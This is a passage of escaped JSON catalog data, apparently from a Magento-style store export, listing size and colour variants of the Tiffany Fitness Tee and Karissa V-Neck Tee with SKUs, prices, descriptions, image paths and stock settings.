keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"White\"},\"1458\":{\"sku\":\"WS09-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Tiffany Fitness Tee-XL-Blue\",\"description\":\"<p>You\'ll work out and look cute doing it in the short-sleeve Tiffany Fitness Tee. The longer length and fitted cut offer a smoother silhouette, while scoop neck pattern and drape effects lend a trendy touch.<\\/p>\\n<p>&bull; Teal soft scoop neck tee.<br \\/>&bull; Contrast stitching pattern. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tiffany-fitness-tee-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws09-blue_back.jpg\",\"image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"1459\":{\"sku\":\"WS09-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Tiffany Fitness Tee-XL-Red\",\"description\":\"<p>You\'ll work out and look cute doing it in the short-sleeve Tiffany Fitness Tee. The longer length and fitted cut offer a smoother silhouette, while scoop neck pattern and drape effects lend a trendy touch.<\\/p>\\n<p>&bull; Teal soft scoop neck tee.<br \\/>&bull; Contrast stitching pattern. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tiffany-fitness-tee-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"1460\":{\"sku\":\"WS09-XL-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Tiffany Fitness Tee-XL-White\",\"description\":\"<p>You\'ll work out and look cute doing it in the short-sleeve Tiffany Fitness Tee. The longer length and fitted cut offer a smoother silhouette, while scoop neck pattern and drape effects lend a trendy touch.<\\/p>\\n<p>&bull; Teal soft scoop neck tee.<br \\/>&bull; Contrast stitching pattern. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tiffany-fitness-tee-xl-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"White\"},\"1461\":{\"sku\":\"WS09\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Tiffany Fitness Tee\",\"description\":\"<p>You\'ll work out and look cute doing it in the short-sleeve Tiffany Fitness Tee. The longer length and fitted cut offer a smoother silhouette, while scoop neck pattern and drape effects lend a trendy touch.<\\/p>\\n<p>&bull; Teal soft scoop neck tee.<br \\/>&bull; Contrast stitching pattern. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tee,material=Organic Cotton,pattern=Solid,climate=Indoor|Warm,eco_collection=Yes,performance_fabric=No,erin_recommends=No,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WS09-XS-Blue,size=XS,color=Blue|sku=WS09-XS-Red,size=XS,color=Red|sku=WS09-XS-White,size=XS,color=White|sku=WS09-S-Blue,size=S,color=Blue|sku=WS09-S-Red,size=S,color=Red|sku=WS09-S-White,size=S,color=White|sku=WS09-M-Blue,size=M,color=Blue|sku=WS09-M-Red,size=M,color=Red|sku=WS09-M-White,size=M,color=White|sku=WS09-L-Blue,size=L,color=Blue|sku=WS09-L-Red,size=L,color=Red|sku=WS09-L-White,size=L,color=White|sku=WS09-XL-Blue,size=XL,color=Blue|sku=WS09-XL-Red,size=XL,color=Red|sku=WS09-XL-White,size=XL,color=White\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws09-blue_back.jpg\",\"image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tee\",\"material\":\"Organic Cotton\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"Yes\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"Yes\"},\"1462\":{\"sku\":\"WS10-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Karissa V-Neck Tee-XS-Green\",\"description\":\"<p>The Karissa V-Neck Tee features a semi-fitted shape that\'s flattering for every figure. You can hit the gym with confidence while it hugs curves and hides common \\\"problem\\\" areas.<\\/p>\\n<p>&bull; Pink heather soft v-neck tee. <br \\/>&bull; Luma signature micro sleeves.<br \\/>&bull; Semi-fitted. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"karissa-v-neck-tee-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"1463\":{\"sku\":\"WS10-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Karissa V-Neck Tee-XS-Red\",\"description\":\"<p>The Karissa V-Neck Tee features a semi-fitted shape that\'s flattering for every figure. You can hit the gym with confidence while it hugs curves and hides common \\\"problem\\\" areas.<\\/p>\\n<p>&bull; Pink heather soft v-neck tee. <br \\/>&bull; Luma signature micro sleeves.<br \\/>&bull; Semi-fitted. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"karissa-v-neck-tee-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws10-red_back.jpg\",\"image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws10-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"1464\":{\"sku\":\"WS10-XS-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Karissa V-Neck Tee-XS-Yellow\",\"description\":\"<p>The Karissa V-Neck Tee features a semi-fitted shape that\'s flattering for every figure. You can hit the gym with confidence while it hugs curves and hides common \\\"problem\\\" areas.<\\/p>\\n<p>&bull; Pink heather soft v-neck tee. <br \\/>&bull; Luma signature micro sleeves.<br \\/>&bull; Semi-fitted. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"karissa-v-neck-tee-xs-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Yellow\"},\"1465\":{\"sku\":\"WS10-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Karissa V-Neck Tee-S-Green\",\"description\":\"<p>The Karissa V-Neck Tee features a semi-fitted shape that\'s flattering for every figure. You can hit the gym with confidence while it hugs curves and hides common \\\"problem\\\" areas.<\\/p>\\n<p>&bull; Pink heather soft v-neck tee. <br \\/>&bull; Luma signature micro sleeves.<br \\/>&bull; Semi-fitted. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"karissa-v-neck-tee-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws10-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"1466\":{\"sku\":\"WS10-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Karissa V-Neck Tee-S-Red\",\"description\":\"<p>The Karissa V-Neck Tee features a semi-fitted shape that\'s flattering for every figure. You can hit the gym with confidence while it hugs curves and hides common \\\"problem\\\" areas.<\\/p>\\n<p>&bull; Pink heather soft v-neck tee. <br \\/>&bull; Luma signature micro sleeves.<br \\/>&bull; Semi-fitted. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"karissa-v-neck-tee-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0